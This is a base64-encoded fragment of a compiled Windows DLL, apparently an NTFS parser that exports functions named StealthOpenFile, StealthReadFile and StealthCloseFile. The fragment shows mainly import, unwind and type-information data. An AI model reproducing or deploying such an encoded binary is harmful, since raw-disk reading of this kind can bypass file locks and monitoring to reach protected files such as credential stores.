QDojQEAYI0BAAAAAAAAAAAAAAAAAAAAAAAAAAAAwJEBAGiUAQColQEAAAAAAAAAAAAAAAAAAAAAAAAAAADokQEAQJQBAKiVAQAAAAAAAAAAAAAAAAAAAAAAAAAAABCSAQBolAEAqJUBAAAAAAAAAAAAAAAAAAAAAAAAAAAAOJIBAECUAQColQEAAAAAAAAAAAAAAAAAAAAAAAAAAABgkgEAaJQBAKiVAQAAAAAAAAAAAAAAAAAAAAAAAAAAAIiSAQBAlAEAqJUBAAAAAAAAAAAAAAAAAAAAAAAAAAAAsJIBAAAAAAAAAAAAAAAAANiSAQBAlAEAqJUBAAAAAAAAAAAAAAAAAAAAAAAAAAAAKJMBAGiUAQColQEAAJMBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFCTAQCQlAEAAAAAAAAAAAAAAAAAAAAAAHiTAQBolAEAqJUBAAAAAAAAAAAAAAAAAAAAAAAAAAAAoJMBAGiUAQColQEAAAAAAAAAAAAAAAAAAAAAAAAAAADwkwEAaJQBAKiVAQDIkwEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGJQBAGiUAQColQEAAAAAAAAAAAAAAAAAAAAAAAAAAABAlAEAqJUBAAAAAAAAAAAAAAAAAAAAAABolAEAqJUBAAAAAAAAAAAAAAAAAAAAAACQlAEAAAAAAAAAAAAAAAAAuJQBAAAAAAAAAAAAAAAAAOCUAQAAAAAAAAAAAAAAAAAIlQEAAAAAAAAAAAAAAAAAMJUBAAAAAAAAAAAAAAAAAFiVAQCAlQEAAAAAAAAAAAAAAAAAAAAAAICVAQAAAAAAAAAAAAAAAAColQEAAAAAAAAAAAAAAAAAgNQBAAIAAAAAAAAA/////wAAAABAAAAA0JUBAAAAAAAAAAAAAAAAALjUAQACAAAAAAAAAP////8AAAAAQAAAAOiVAQAAAAAAAAAAAAAAAAD41AEAAgAAAAAAAAD/////AAAAAEAAAAAAlgEAAAAAAAAAAAAAAAAAMNUBAAIAAAAAAAAA/////wAAAABAAAAAGJYBAAAAAAAAAAAAAAAAAGjVAQACAAAAAAAAAP////8AAAAAQAAAADCWAQAAAAAAAAAAAAAAAACg1QEAAgAAAAAAAAD/////AAAAAEAAAABIlgEAAAAAAAAAAAAAAAAA4NUBAAAAAAAAAAAA/////wAAAABAAAAAYJYBAAAAAAAAAAAAAAAAABDWAQACAAAAAAAAAP////8AAAAAQAAAAHiWAQAAAAAAAAAAAAAAAAB41wEAAAAAAEgAAAD/////AAAAAEAAAABQlwEAAAAAAAAAAAAAAAAAONYBAAMAAAAAAAAA/////wAAAABAAAAAkJYBAAAAAAAAAAAAAAAAAGDWAQABAAAAAAAAAP////8AAAAAQAAAAKiWAQAAAAAAAAAAAAAAAACI1gEAAgAAAAAAAAD/////AAAAAEAAAADAlgEAAAAAAAAAAAAAAAAAsNYBAAIAAAAAAAAA/////wAAAABAAAAA2JYBAAAAAAAAAAAAAAAAAGDYAQAAAAAASAAAAP////8AAAAAQAAAAMiXAQAAAAAAAAAAAAAAAADY1gEAAwAAAAAAAAD/////AAAAAEAAAADwlgEAAAAAAAAAAAAAAAAAANcBAAIAAAAAAAAA/////wAAAABAAAAACJcBAAAAAAAAAAAAAAAAACjXAQABAAAAAAAAAP////8AAAAAQAAAACCXAQAAAAAAAAAAAAAAAABQ1wEAAQAAAAAAAAD/////AAAAAEAAAAA4lwEAAAAAAAAAAAAAAAAAeNcBAAAAAAAAAAAA/////wAAAABAAAAAUJcBAAAAAAAAAAAAAAAAAKjXAQAAAAAAAAAAAP////8AAAAAQAAAAGiXAQAAAAAAAAAAAAAAAADg1wEAAAAAAAAAAAD/////AAAAAEAAAACAlwEAAAAAAAAAAAAAAAAAENgBAAAAAAAAAAAA/////wAAAABAAAAAmJcBAAAAAAAAAAAAAAAAADjYAQAAAAAAAAAAAP////8AAAAAQAAAALCXAQAAAAAAAAAAAAAAAACA2AEAAQAAAAAAAAD/////AAAAAEAAAADglwEAAAAAAAAAAAAAAAAAYNgBAAAAAAAAAAAA/////wAAAABAAAAAyJcBAAAAAAAAAAAAAAAAAKjYAQAAAAAAAAAAAP////8AAAAAQAAAAPiXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAABQjwEAAAAAAAAAAAAAAAAAAAAAAAMAAABwjwEAAAAAAAAAAAAAAAAAAAAAAAMAAACQjwEAAAAAAAAAAAAAAAAAAAAAAAMAAACwjwEAAAAAAAAAAAAAAAAAAAAAAAMAAADQjwEAAAAAAAAAAAAAAAAAAAAAAAMAAADwjwEAAAAAAAAAAAAAAAAAAAAAAAEAAAAQkAEAAAAAAAAAAAAAAAAAAAAAAAMAAAAgkAEAAAAAAAAAAAAAAAAAAQAAAAQAAABAkAEAAAAAAAAAAAAAAAAAAAAAAAIAAABokAEAAAAAAAAAAAAAAAAAAAAAAAMAAACAkAEAAAAAAAAAAAAAAAAAAAAAAAMAAACgkAEAAAAAAAAAAAAAAAAAAQAAAAQAAADAkAEAAAAAAAAAAAAAAAAAAAAAAAMAAADokAEAAAAAAAAAAAAAAAAAAAAAAAIAAAAIkQEAAAAAAAAAAAAAAAAAAAAAAAIAAAAgkQEAAAAAAAAAAAAAAAAAAAAAAAEAAAA4kQEAAAAAAAAAAAAAAAAAAAAAAAEAAABIkQEAAAAAAAAAAAAAAAAAAAAAAAEAAABYkQEAAAAAAAAAAAAAAAAAAAAAAAEAAABokQEAAAAAAAAAAAAAAAAAAAAAAAEAAAB4kQEAAAAAAAAAAAAAAAAAAAAAAAEAAACgkQEAAAAAAAAAAAAAAAAAAAAAAAIAAACIkQEAAAAAAAAAAAAAAAAAAAAAAAEAAACwkQEAAAAAAAAAAAABAAAAAAAAAAAAAACA1AEA0JUBABCYAQAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAuNQBAOiVAQA4mAEAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAPjUAQAAlgEAYJgBAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAw1QEAGJYBAIiYAQAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAaNUBADCWAQCwmAEAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAKDVAQBIlgEA2JgBAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAADg1QEAYJYBAACZAQAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAENYBAHiWAQAomQEAAAAAAAAAAAAAAAAAAAAAAAEAAABIAAAAAAAAADjWAQCQlgEAUJkBAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAA41gEAkJYBAHiZAQAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAYNYBAKiWAQCgmQEAAAAAAAAAA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nABBgIABlICMBEYBAAYNAkAClIGcNRvAAAIhgEA4FIAAP////9cUwAAAAAAAMVTAAD/////ERMCAApyBjDUbwAAMIYBAP////+QBAEAIFIAAP////88UgAAAAAAAMxSAAD/////ERMCAApSBjDUbwAAWIYBAP////+gBAEAgFEAAP////+gUQAAAAAAAAVSAAD/////GTAKACE0FQAQsgzwCuAI0AbABHADYAJQAP4AAICGAQBaAAAA/////2AEAQAAAAAAbAQBAAEAAAB8BAEAkE4AAP////8sTwAAAAAAAFRPAAABAAAA9U8AAAIAAAAOUAAAAQAAAFJRAAD/////ERMCAApSBjDUbwAAqIYBAP////8ABgEA8E0AAP////8QTgAAAAAAAIJOAAD/////GTMKACQ0GQAT8gzwCuAI0AbABHADYAJQAP4AANCGAQByAAAA/////zAEAQAAAAAAPAQBAAEAAABMBAEAAEsAAP////9ESwAAAAAAAHVLAAABAAAAEUwAAAIAAAAqTAAAAQAAAMFNAAD/////AQ0EAA1SCeAHYAZQIQoEAAp0DAAFNAsA8EQAABhFAABsqQEAIQAEAAB0DAAANAsA8EQAABhFAABsqQEAIQAAAPBEAAAYRQAAbKkBABkjBwAVARIACeAH0AXAAzACUAAA7MkAAIAAAAAhGwYAG/QbABN0GgAIZBkAwD8AAGZAAAC4qQEAIQAGAAD0GwAAdBoAAGQZAMA/AABmQAAAuKkBACEAAADAPwAAZkAAALipAQAZHwUADTRQAA0BTAAGcAAA7MkAAFgCAAAZOQkAKDR4ABcBcAAI8AbgBHADYAJQAAAA/gAA+IYBAHIDAAD/////IAUBAP////8sBQEA/////10FAQD/////jgUBAAAAAAC/BQEA/////8sFAQDAOQAA/////5s6AAAAAAAAszoAAP////+4OgAAAQAAACk7AAD/////LjsAAAAAAABZOwAA/////147AAACAAAAyTsAAP/////OOwAAAAAAAPI7AAD/////9zsAAAMAAABpPAAA/////248AAAAAAAAhDwAAAQAAACZPAAAAAAAABQ9AAD/////GT0AAAUAAACJPQAA/////wENBgANVAkADTIJ4AdwBmAhBQIABTQIAKA4AADjOAAAIKsBACEAAgAANAgAoDgAAOM4AAAgqwEAIQAAAKA4AADjOAAAIKsBABEiBgAiNBMAFtIScBFgEFDUbwAAIIcBAP////8QBwEA4DUAAP////9WNgAAAAAAAFg3AAD/////ARQGABRkCAAUNAYAFDIQcAEKBAAKZAkACjIGcCEFAgAFNAYA4DIAAAAzAACwqwEAIQACAAA0BgDgMgAAADMAALCrAQAhAAAA4DIAAAAzAACwqwEAER4IAB50CwAZZAoAFDQIAAZSAuDUbwAASIcBAP////9QBgEA/////1wGAQD/////aAYBAP////90BgEA/////4AGAQD/////jAYBAP////+YBgEA/////6QGAQD/////sAYBAP////+8BgEAgC0AAP/////OLQAAAAAAANEtAAD/////bC4AAAAAAACGLgAA/////5ouAAABAAAAtC4AAP/////ILgAAAgAAAOIuAAD/////9i4AAAMAAAAQLwAA/////7MvAAAEAAAA1C8AAP////9qMAAABQAAAIQwAAD/////mzAAAAYAAADlMAAA/////wIxAAAHAAAAHDEAAP////8wMQAACAAAAEoxAAD/////azEAAAkAAACFMQAA/////xQyAAAAAAAAERMCAApSBjDUbwAAcIcBAP////8QBgEAkCwAAP////+wLAAAAAAAAMQsAAD/////ERgEABg0CQAKUgZw1G8AAJiHAQAQLAAA/////zcsAAAAAAAASywAAP////8RHwoAH1QRABs0EAAPcgvwCeAHwAVwBGDUbwAAwIcBAP/////QBgEAAAAAANwGAQDQKQAA/////+IqAAAAAAAA8yoAAAEAAAAWKwAAAAAAABsrAAD/////ESIKACJkDQAdVAwAGDQLAApSBvAE4AJw1G8AAOiHAQD/////8AYBAAAAAAD8BgEAgCgAAP/////iKAAAAAAAAPMoAAABAAAAFikAAAAAAAAbKQAA/////xETAgAKUgYw1G8AABCIAQDgJwAA/////wAoAAAAAAAAZSgAAP////8REwIAClIGMNRvAAA4iAEA//////AEAQAAAAAA/AQBAPAmAAD/////ZycAAAAAAAB4JwAAAQAAAKMnAAD/////ATQGADQ0BgAKZAcACjIGcBETAgAKkgYw1G8AAGCIAQD/////EAUBAEAjAAD/////tyMAAAAAAABHJAAA/////xETA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0FkZHJlc3MAANwCSGVhcFNpemUAAMAEU2xlZXAAawJHZXRTdGRIYW5kbGUAADQFV3JpdGVGaWxlABoCR2V0TW9kdWxlRmlsZU5hbWVXAADXAkhlYXBGcmVlAADTAkhlYXBBbGxvYwAMA0lzVmFsaWRDb2RlUGFnZQBuAUdldEFDUAAAPgJHZXRPRU1DUAAAeAFHZXRDUEluZm8AcAJHZXRTdHJpbmdUeXBlVwAAgARTZXRMYXN0RXJyb3IAABgEUnRsQ2FwdHVyZUNvbnRleHQAJgRSdGxWaXJ0dWFsVW53aW5kAADiBFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAswRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIA6wJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50AMYBR2V0Q3VycmVudFByb2Nlc3MAzgRUZXJtaW5hdGVQcm9jZXNzAADTBFRsc0FsbG9jAADVBFRsc0dldFZhbHVlANYEVGxzU2V0VmFsdWUA1ARUbHNGcmVlAGoCR2V0U3RhcnR1cEluZm9XAB4CR2V0TW9kdWxlSGFuZGxlVwAAUQJHZXRQcm9jZXNzSGVhcAAA+gFHZXRGaWxlVHlwZQDSAERlbGV0ZUNyaXRpY2FsU2VjdGlvbgAZAkdldE1vZHVsZUZpbGVOYW1lQQAAqQNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDHAUdldEN1cnJlbnRQcm9jZXNzSWQAgAJHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQDhAUdldEVudmlyb25tZW50U3RyaW5nc1cAAGcBRnJlZUVudmlyb25tZW50U3RyaW5nc1cA8gBFbnRlckNyaXRpY2FsU2VjdGlvbgAAOwNMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAQANMb2FkTGlicmFyeUV4VwAA2gJIZWFwUmVBbGxvYwCMA091dHB1dERlYnVnU3RyaW5nVwAAQQNMb2FkTGlicmFyeVcAAC8DTENNYXBTdHJpbmdXAACgAUdldENvbnNvbGVDUAAAsgFHZXRDb25zb2xlTW9kZQAAdQRTZXRGaWxlUG9pbnRlckV4AACUBFNldFN0ZEhhbmRsZQAAMwVXcml0ZUNvbnNvbGVXAF0BRmx1c2hGaWxlQnVmZmVycwAAjwBDcmVhdGVGaWxlVwAAAAAAgY0mUgAAAAC2uQEAAQAAAAMAAAADAAAAmLkBAKS5AQCwuQEAwEUAAMA/AADwRAAAyLkBANm5AQDpuQEAAAABAAIATlRGU1BhcnNlckRMTC5kbGwAU3RlYWx0aENsb3NlRmlsZQBTdGVhbHRoT3BlbkZpbGUAU3RlYWx0aFJlYWRGaWxlAAAAAAAAAABIJwGAAQAAAAAAAAAAAAAALj9BVmJhZF9hbGxvY0BzdGRAQAAAAAAASCcBgAEAAAAAAAAAAAAAAC4/QVZleGNlcHRpb25Ac3RkQEAAAAAAAEgnAYABAAAAAAAAAAAAAAAuP0FWbG9naWNfZXJyb3JAc3RkQEAAAABIJwGAAQAAAAAAAAAAAAAALj9BVmxlbmd0aF9lcnJvckBzdGRAQAAASCcBgAEAAAAAAAAAAAAAAC4/QVZvdXRfb2ZfcmFuZ2VAc3RkQEAAAAAAAAAAAAAASCcBgAEAAAAAAAAAAAAAAC4/QVZ0eXBlX2luZm9AQAAyot8tmSsAAM1dINJm1P//AQAAAAIAAAACAAAAAAAAAAECBAgAAAAAAAAAAAAAAACkAwAAYIJ5giEAAAAAAAAApt8AAAAAAAChpQAAAAAAAIGf4PwAAAAAQH6A/AAAAACoAwAAwaPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQP4AAAAAAAC1AwAAwaPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQf4AAAAAAAC2AwAAz6LkohoA5aLoolsAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQH6h/gAAAABRBQAAUdpe2iAAX9pq2jIAAAAAAAAAAAAAAAAAAAAAAIHT2N7g+QAAMX6B/gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAACAgICAgICAgICAgICAgICAgICAgICAgICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgxAGAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoAAAAAAABBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA